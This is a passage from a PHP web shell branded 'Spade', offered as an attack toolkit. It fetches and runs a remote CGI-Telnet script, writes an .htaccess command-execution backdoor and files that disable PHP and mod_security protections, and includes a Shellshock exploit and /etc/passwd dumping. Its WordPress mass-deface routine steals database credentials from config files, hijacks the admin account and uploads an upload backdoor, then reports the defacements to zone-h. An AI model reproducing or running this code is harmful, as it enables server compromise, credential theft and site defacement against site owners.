  4445. if(!$update OR !$conn OR !$db) {
  4446. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  4447. } else {
  4448. echo "<font color=lime>Success.</font><br>";
  4449. }
  4450. echo "</div>";
  4451. mysql_close($conn);
  4452. }
  4453. }
  4454. } else {
  4455. echo "<center>
  4456. <h1 class='titulo'>AUTO EDIT WP TITLE/CONTENT</h1>
  4457. <form method='post'>
  4458. DIR Config: <br>
  4459. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  4460. Set Title: <br>
  4461. <input type='text' name='new_title' value='Hacked By Spade' placeholder='New Title'><br><br>
  4462. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  4463. <span>If You Select <u>Y</u> Paste Your Deface Page below!, If <u>N</u> just leave it Blank.</span><br>
  4464. <textarea name='edit_content' placeholder='Paste Your Deface Page here!' style='width: 450px; height: 150px;'></textarea><br>
  4465. <input type='submit' name='hajar' value='Submit' style='width: 450px;'><br>
  4466. </form>
  4467. <span>NB: These tools work if run in the <u>config</u> folder ( ex: /home/user/public_html/name_folder_config )</span><br>
  4468. ";
  4469. }
  4470. } elseif($_GET['do'] == 'zoneh') {
  4471. if($_POST['submit']) {
  4472. $domain = explode("\r\n", $_POST['url']);
  4473. $nick = $_POST['nick'];
  4474. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier={$nick}/published=0' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}/published=0</a><br>";
  4475. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier={$nick}' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}</a><br><br>";
  4476. function zoneh($url,$nick) {
  4477. $ch = curl_init("http://www.zone-h.com/notify/single");
  4478. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  4479. curl_setopt($ch, CURLOPT_POST, true);
  4480. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer={$nick}&domain1={$url}&hackmode=1&reason=1&submit=Send");
  4481. return curl_exec($ch);
  4482. curl_close($ch);
  4483. }
  4484. foreach($domain as $url) {
  4485. $zoneh = zoneh($url,$nick);
  4486. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  4487. echo "$url :~> <font color=lime>OK</font><br>";
  4488. } else {
  4489. echo "$url :~> <font color=red>ERROR</font><br>";
  4490. }
  4491. }
  4492. } else {
  4493. echo "<center><h1 class='titulo'>ZONE-H</h1></center><br>";
  4494. echo "<center><form method='post'>
  4495. <u>Defacer</u>: <br>
  4496. <input type='text' name='nick' size='50' value='Spade'><br>
  4497. <u>Domains</u>: <br>
  4498. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  4499. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  4500. </form>";
  4501. }
  4502. echo "</center>";
  4503. } elseif($_GET['do'] == 'cgi') {
  4504. @mkdir('spade_cgi', 0755);
  4505. @chdir("spade_cgi");
  4506. $file_cgi = "cgi.cin";
  4507. $isi_htcgi = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  4508. $htcgi = fopen(".htaccess", "w");
  4509. $cgi_script = file_put_contents("http://pastebin.com/raw/wRc0svUF");
  4510. $cgi = fopen($file_cgi, "w");
  4511. fwrite($cgi, base64_decode($cgi_script));
  4512. fwrite($htcgi, $isi_htcgi);
  4513. chmod($file_cgi, 0755);
  4514. echo "<center><h1 class='titulo'>CGI-TELNET 2k12</h1><br>";
  4515. echo "<iframe src='spade_cgi/cgi.cin' width='100%' height='100%' frameborder='0' scrolling='no'></iframe></center>";
  4516. } elseif($_GET['do'] == 'fake_root') {
  4517. ob_start();
  4518. function reverse($url) {
  4519. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  4520. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  4521. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  4522. curl_setopt($ch, CURLOPT_HEADER, 0);
  4523. curl_setopt($ch, CURLOPT_POST, 1);
  4524. $resp = curl_exec($ch);
  4525. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  4526. $array = explode(",,", $resp);
  4527. unset($array[0]);
  4528. foreach($array as $lnk) {
  4529. $lnk = "http://$lnk";
  4530. $lnk = str_replace(",", "", $lnk);
  4531. echo $lnk."\n";
  4532. ob_flush();
  4533. flush();
  4534. }
  4535. curl_close($ch);
  4536. }
  4537. function cek($url) {
  4538. $ch = curl_init($url);
  4539. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  4540. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  4541. $resp = curl_exec($ch);
  4542. return $resp;
  4543. }
  4544. $cwd = getcwd();
  4545. $ambil_user = explode("/", $cwd);
  4546. $user = $ambil_user[2];
  4547. if($_POST['reverse']) {
  4548. $site = explode("\r\n", $_POST['url']);
  4549. $file = $_POST['file'];
  4550. foreach($site as $url) {
  4551. $cek = cek("$url/.~$user/$file");
  4552. if(preg_match("/hacked/i", $cek)) {
  4553. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/.~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  4554. }
  4555. }
  4556. } else {
  4557. echo "<center><h1 class='titulo'>FAKE ROOTER</h1></center><br>";
  4558. echo "<center><form method='post'>
  4559. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  4560. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  4561. Domain: <br>
  4562. <textarea style='width: 450px; height: 250px;' name='url'>";
  4563. reverse($_SERVER['HTTP_HOST']);
  4564. echo "</textarea><br>
  4565. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  4566. </form><br>
  4567. NB: Upload Your deface page in /home/user not in the /home/user/public_html (Common Sense Enters here).</center>";
  4568. }
  4569. } elseif($_GET['do'] == 'adminer') {
  4570. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  4571. function adminer($url, $isi) {
  4572. $fp = fopen($isi, "w");
  4573. $ch = curl_init();
  4574. curl_setopt($ch, CURLOPT_URL, $url);
  4575. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  4576. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  4577. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  4578. curl_setopt($ch, CURLOPT_FILE, $fp);
  4579. return curl_exec($ch);
  4580. curl_close($ch);
  4581. fclose($fp);
  4582. ob_flush();
  4583. flush();
  4584. }
  4585. if(file_exists('adminer.php')) {
  4586. echo "<center><h1 class='titulo'>ADMINER</h1></center><br>";
  4587. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> ADMINER LOGIN <-</a></font></center>";
  4588. } else {
  4589. if(adminer("https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php","adminer.php")) {
  4590. echo "<center><h1 class='titulo'>ADMINER</h1></center><br>";
  4591. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> ADMINER LOGIN <-</a></font></center>";
  4592. } else {
  4593. echo "<center><font color=red>Failed to get Adminer!</font></center>";
  4594. }
  4595. }
  4596. }elseif($_GET['do'] == 'bypasser') {
  4597. echo "<center><h1 class='titulo'>BYPASS</h1><br><br><h2 class='titulo'>BYPASS ETC/PASSWD</h2></center><br>";
  4598. echo '<center>Bypass etc/passw With:<br>
  4599. <table style="width:50%">
  4600. <tr>
  4601. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  4602. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  4603. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  4604. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  4605. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  4606. </tr></table>Bypass User With : <table style="width:50%">
  4607. <tr>
  4608. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  4609. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  4610. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  4611. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  4612. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  4613. </tr>
  4614. </table><br>';
  4615. echo '<center><h2 class="titulo"> SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS </h2><br><p1>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir</p1><table style="width: 30%;"><tr><td><form method="post"><input type="submit" value="php.ini" style="width: 100%;" name="phpini"></form></td><td><form method="post"><input type="submit" value=".htaccess" style="width: 100%;" name="htaccessmod"></form></td><td><form method="post"><input type="submit" value=".htaccess(perl)" style="width: 100%;" name="htaccessperl"></form></td><td><form method="post" ><input type="submit" value=".htaccess(shell backdoor)" style="width: 100%;" name="htaccessbd"></td></tr><tr><td><input type=submit name="apache" value=".htaccess(apache)"></td><td><input type=submit name="litespeed" value=".htaccess(litespeed)"></td><td><input type=submit name="iniphp" value="ini.php"></td></tr></form></table><br>';
  4616. if(isset($_POST['iniphp'])){
  4617. $ini = "<?\necho ini_get('safe_mode');\necho ini_get('open_basedir');\ninclude(\$_GET['file']);\nini_restore('safe_mode');\nini_restore('open_basedir');\necho ini_get('safe_mode');
  4618. \necho ini_get('open_basedir');\ninclude(\$_GET['ss']);\n?>"; $php = fopen($GLOBALS['cwd']."ini.php", "w");
  4619. $iniphp = fwrite($php, $ini); if(!$iniphp){echo "<br><font color=red>Unable to Generate INI.PHP</font>"; }else{ echo "<br><font color=lime>INI.PHP Generated Successfully!</font>"; } fclose($iniphp);
  4620.  
  4621. }
  4622. if(isset($_POST['litespeed'])){
  4623. $lite = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>";
  4624. $speed = fopen($GLOBALS['cwd'].".htaccess", "w");
  4625. $litespeed = fwrite($speed, $lite); if(!$litespeed){echo "<br><font color=red>Unable to Generate .HTACCESS(lightspeed)</font>"; }else{ echo "<br><font color=lime>.HTACCESS(lightspeed) Generated Successfully!</font>"; } fclose($speed);
  4626. }
  4627. if(isset($_POST['apache'])){
  4628. $apache = "<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>";
  4629. $apacheche = fopen($GLOBALS['cwd'].".htaccess", "w");
  4630. $lelss = fwrite($apacheche, $apache); if(!$lelss){ echo "<br><font color=red>Unable to Generate .HTACCESS(apache)</font>"; }else{ echo "<br><font color=lime>.HTACCESS(apache) Generated Successfully!</font>"; } fclose($apacheche);
  4631. }
  4632. if(isset($_POST['phpini'])){
  4633. $phpini = "safe_mode=OFF\ndisable_functions=NONE\nsafe_mode_gid=OFF\nopen_basedir=OFF\nallow_url_fopen=ON";
  4634. $spadephp = fopen($GLOBALS['cwd']."php.ini", "w");
  4635. $sulat1 = fwrite($spadephp, $phpini); if(!$sulat1){ echo "<br><font color=red>Unable to Generate PHP.INI</font>";}else{ echo "<br><font color=lime>PHP.INI Generated Successfully!</font>";}
  4636. fclose($spadephp);
  4637. }
  4638. if(isset($_POST['htaccessmod'])){
  4639. $htmod = "<IfModule mod_security.c>\nSecFilterEgine Off\nSecFilterScanPOST Off\nSecFilterCheckURLEncoding Off\nSecFilterCheckUnicodeEncoding Off\n</IfModule>";
  4640. $spademod = fopen($GLOBALS['cwd'].".htaccess", "w");
  4641. $sulat2 = fwrite($spademod, $htmod); if(!$sulat2){ echo "<br><font color=red>Unable to Generate .HTACCESS</font>";}else{ echo "<br><font color=lime>.HTACCESS Generated Successfully!</font>";}
  4642. fclose($spademod);
  4643. }
  4644. if(isset($_POST['htaccessperl'])){
  4645. $htperl = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .sh\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl";
  4646. $spadeperl = fopen($GLOBALS['cwd'].".htaccess", "w");
  4647. $sulat3 = fwrite($spadeperl, $htperl); if(!$sulat3){ echo "<br><font color=red>Unable to Generate .HTACCESS(Perl)</font>";}else{ echo "<br><font color=lime>.HTACCESS(Perl) Generated Successfully!</font>";}
  4648. fclose($spadeperl);
  4649. }
  4650. if(isset($_POST['htaccessbd'])){
  4651. $htbd = base64_decode("PEZpbGVzIH4gIl5cLmh0Ij5cbk9yZGVyIGFsbG93LGRlbnlcbkFsbG93IGZyb20gYWxsXG48L2ZpbGVzPlxuQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuaHRhY2Nlc3NcbiMgPD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTs/Pg==");
  4652. $spadebd = fopen($GLOBALS['cwd'].".htaccess", "w");
  4653. $sulat4 = fwrite($spadebd, $htbd); if(!$sulat4){ echo "<br><font color=red>Unable to Generate .HTACCESS(Shell)</font>";}else{ echo "<br><font color=lime>.HTACCESS(Shell) Generated Successfully!</font>";}
  4654. fclose($spadebd);
  4655. }
  4656. echo "<center><table style='width: 50%;'><tr><h2 class='titulo'>BYPASS CHMOD DIR & FILE PRIV8</h2><br><form method='post'><td><input type='text' name='link3rx' style='width: 100%;' placeholder='ex: ".$dir."'></td></tr><tr><td><input type='submit' value='BYPASS CHMOD DIR'></td></form></tr></table><br>";
  4657.  
  4658. if(isset($_POST['link3rx'])){
  4659. $spade = $_POST['link3rx'];
  4660. $ch = @chmod($spade,'0311');
  4661. if($ch){ echo "<br><font color='lime'>Directory [".$spade."] Successfully Bypassed!</font>"; }else{ echo "<br><font color='red'>Directory [".$spade."] Failed to Bypass!</font>";}
  4662. echo "</center>";
  4663. }
  4664. echo "<center><table style='width: 50%;'><tr><h2 class='titulo'>PHP 5.X SHELLSHOCK EXPLOIT (BYPASS DISABLE_FUNCTION)</h2><br><form method='post'><td><input type=text name='shellshock' style='width: 100%;'></td></tr><tr><td><input type=submit value='SHELLSHOCK'><br></td></tr></table><br>";
  4665. if(isset($_POST['shellshock'])){
  4666. function shellsh0ck($kewl){
  4667. if(strstr(readlink("/bin/sh"), "bash") != FALSE){
  4668. $tmp = tempnam(".", "data");
  4669. putenv("PHP_LOL=(){ x; }; $kewl >$tmp 2>&1");
  4670. mail("spade@127.0.0.1","","","","-bv");
  4671. }else{
  4672. $file=tempnam("/tmp", "xpl");
  4673. putenv("PHP_XPL=() { :;}; {$kewl}>{$file}");
  4674. mail("spade@localhost", "", "", "", "-bv");
  4675. echo file_get_contents($file);
  4676. unlink($file);
  4677. }
  4678. }
  4679. echo"<textarea class='inputzbut' cols='65' rows='15'>".shellsh0ck($_POST['shellshock'])."</textarea></center><br>";
  4680. }
  4681.  
  4682. if ($_POST['awkuser']) {
  4683. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  4684. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  4685. echo "</textarea><br>";
  4686. }
  4687. if ($_POST['systuser']) {
  4688. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  4689. echo system("ls /var/mail");
  4690. echo "</textarea><br>";
  4691. }
  4692. if ($_POST['passthuser']) {
  4693. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  4694. echo passthru("ls /var/mail");
  4695. echo "</textarea><br>";
  4696. }
  4697. if ($_POST['exuser']) {
  4698. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  4699. echo exec("ls /var/mail");
  4700. echo "</textarea><br>";
  4701. }
  4702. if ($_POST['shexuser']) {
  4703. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  4704. echo shell_exec("ls /var/mail");
  4705. echo "</textarea><br>";
  4706. }
  4707. if($_POST['syst'])
  4708. {
  4709. echo"<textarea class='inputz' cols='65' rows='15'>";
  4710. echo system("cat /etc/passwd");
  4711. echo"</textarea><br><br><b></b><br>";
  4712. }
  4713. if($_POST['passth'])
  4714. {
  4715. echo"<textarea class='inputz' cols='65' rows='15'>";
  4716. echo passthru("cat /etc/passwd");
  4717. echo"</textarea><br><br><b></b><br>";
  4718. }
  4719. if($_POST['ex'])
  4720. {
  4721. echo"<textarea class='inputz' cols='65' rows='15'>";
  4722. echo exec("cat /etc/passwd");
  4723. echo"</textarea><br><br><b></b><br>";
  4724. }
  4725. if($_POST['shex'])
  4726. {
  4727. echo"<textarea class='inputz' cols='65' rows='15'>";
  4728. echo shell_exec("cat /etc/passwd");
  4729. echo"</textarea><br><br><b></b><br>";
  4730. }
  4731. echo '<center>';
  4732. if($_POST['melex'])
  4733. {
  4734. echo"<textarea class='inputz' cols='65' rows='15'>";
  4735. for($uid=0;$uid<60000;$uid++){
  4736. $ara = posix_getpwuid($uid);
  4737. if (!empty($ara)) {
  4738. while (list ($key, $val) = each($ara)){
  4739. print "$val:";
  4740. }
  4741. print "\n";
  4742. }
  4743. }
  4744. echo"</textarea><br><br>";
  4745. }
  4746. } elseif($_GET['do'] == 'auto_dwp') {
  4747. if($_POST['auto_deface_wp']) {
  4748. function anucurl($sites) {
  4749. $ch = curl_init($sites);
  4750. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4751. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4752. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4753. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  4754. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4755. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4756. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4757. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4758. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4759. $data = curl_exec($ch);
  4760. curl_close($ch);
  4761. return $data;
  4762. }
  4763. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  4764. $post = array(
  4765. "log" => "$userr",
  4766. "pwd" => "$pass",
  4767. "rememberme" => "forever",
  4768. "wp-submit" => "$wp_submit",
  4769. "redirect_to" => "$web",
  4770. "testcookie" => "1",
  4771. );
  4772. $ch = curl_init($cek);
  4773. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4774. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4775. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4776. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4777. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4778. curl_setopt($ch, CURLOPT_POST, 1);
  4779. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  4780. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4781. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4782. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4783. $data = curl_exec($ch);
  4784. curl_close($ch);
  4785. return $data;
  4786. }
  4787. $scan = $_POST['link_config'];
  4788. $link_config = scandir($scan);
  4789. $script = htmlspecialchars($_POST['script']);
  4790. $user = "spade";
  4791. $pass = "spade";
  4792. $passx = md5($pass);
  4793. foreach($link_config as $dir_config) {
  4794. if(!is_file("$scan/$dir_config")) continue;
  4795. $config = file_get_contents("$scan/$dir_config");
  4796. if(preg_match("/WordPress/", $config)) {
  4797. $dbhost = ambilkata($config,"DB_HOST', '","'");
  4798. $dbuser = ambilkata($config,"DB_USER', '","'");
  4799. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4800. $dbname = ambilkata($config,"DB_NAME', '","'");
  4801. $dbprefix = ambilkata($config,"table_prefix = '","'");
  4802. $prefix = $dbprefix."users";
  4803. $option = $dbprefix."options";
  4804. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4805. $db = mysql_select_db($dbname);
  4806. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4807. $result = mysql_fetch_array($q);
  4808. $id = $result[ID];
  4809. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4810. $result2 = mysql_fetch_array($q2);
  4811. $target = $result2[option_value];
  4812. if($target == '') {
  4813. echo "[-] <font color=red>error, could not take his domain name</font><br>";
  4814. } else {
  4815. echo "[+] $target <br>";
  4816. }
  4817. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  4818. if(!$conn OR !$db OR !$update) {
  4819. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  4820. mysql_close($conn);
  4821. } else {
  4822. $site = "$target/wp-login.php";
  4823. $site2 = "$target/wp-admin/theme-install.php?upload";
  4824. $b1 = anucurl($site2);
  4825. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  4826. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  4827. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  4828. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  4829. $www = "m.php";
  4830. $fp5 = fopen($www,"w");
  4831. fputs($fp5,$upload3);
  4832. $post2 = array(
  4833. "_wpnonce" => "$anu2",
  4834. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  4835. "themezip" => "@$www",
  4836. "install-theme-submit" => "Install Now",
  4837. );
  4838. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  4839. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4840. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4841. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4842. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4843. curl_setopt($ch, CURLOPT_POST, 1);
  4844. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  4845. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4846. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4847. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4848. $data3 = curl_exec($ch);
  4849. curl_close($ch);
  4850. $y = date("Y");
  4851. $m = date("m");
  4852. $namafile = "id.php";
  4853. $fpi = fopen($namafile,"w");
  4854. fputs($fpi,$script);
  4855. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4856. curl_setopt($ch6, CURLOPT_POST, true);
  4857. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4858. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4859. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4860. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4861. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  4862. $postResult = curl_exec($ch6);
  4863. curl_close($ch6);
  4864. $as = "$target/k.php";
  4865. $bs = anucurl($as);
  4866. if(preg_match("#$script#is", $bs)) {
  4867. echo "[+] <font color='lime'>Manage...</font><br>";
  4868. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4869. } else {
  4870. echo "[-] <font color='red'>Error!...</font><br>";
  4871. echo "[!!] Just Try Manual: <br>";
  4872. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4873. echo "[+] username: <font color=lime>$user</font><br>";
  4874. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4875. }
  4876. mysql_close($conn);
  4877. }
  4878. }
  4879. }
  4880. } else {
  4881. echo "<center><h1 class='titulo'>WordPress Auto Deface</h1>
  4882. <form method='post'>
  4883. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  4884. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Spade' required><br>
  4885. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Deface!!'>
  4886. </form>
  4887. <br><span>NB: These tools work if run in a folder <u>config</u> ( ex: /home/user/public_html/name_folder_config )</span>
  4888. </center>";
  4889. }
  4890. } elseif($_GET['do'] == 'auto_dwp2') {
  4891. if($_POST['auto_deface_wp']) {
  4892. function anucurl($sites) {
  4893. $ch = curl_init($sites);
  4894. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4895. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4896. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4897. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  4898. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4899. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4900. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4901. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4902. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  4903. $data = curl_exec($ch);
  4904. curl_close($ch);
  4905. return $data;
  4906. }
  4907. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  4908. $post = array(
  4909. "log" => "$userr",
  4910. "pwd" => "$pass",
  4911. "rememberme" => "forever",
  4912. "wp-submit" => "$wp_submit",
  4913. "redirect_to" => "$web",
  4914. "testcookie" => "1",
  4915. );
  4916. $ch = curl_init($cek);
  4917. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4918. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4919. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4920. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4921. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4922. curl_setopt($ch, CURLOPT_POST, 1);
  4923. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  4924. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4925. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4926. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4927. $data = curl_exec($ch);
  4928. curl_close($ch);
  4929. return $data;
  4930. }
  4931. $link = explode("\r\n", $_POST['link']);
  4932. $script = htmlspecialchars($_POST['script']);
  4933. $user = "spade";
  4934. $pass = "spade";
  4935. $passx = md5($pass);
  4936. foreach($link as $dir_config) {
  4937. $config = anucurl($dir_config);
  4938. $dbhost = ambilkata($config,"DB_HOST', '","'");
  4939. $dbuser = ambilkata($config,"DB_USER', '","'");
  4940. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4941. $dbname = ambilkata($config,"DB_NAME', '","'");
  4942. $dbprefix = ambilkata($config,"table_prefix = '","'");
  4943. $prefix = $dbprefix."users";
  4944. $option = $dbprefix."options";
  4945. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4946. $db = mysql_select_db($dbname);
  4947. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4948. $result = mysql_fetch_array($q);
  4949. $id = $result[ID];
  4950. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4951. $result2 = mysql_fetch_array($q2);
  4952. $target = $result2[option_value];
  4953. if($target == '') {
  4954. echo "[-] <font color=red>error, could not take his domain name</font><br>";
  4955. } else {
  4956. echo "[+] $target <br>";
  4957. }
  4958. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  4959. if(!$conn OR !$db OR !$update) {
  4960. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  4961. mysql_close($conn);
  4962. } else {
  4963. $site = "$target/wp-login.php";
  4964. $site2 = "$target/wp-admin/theme-install.php?upload";
  4965. $b1 = anucurl($site2);
  4966. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  4967. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  4968. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
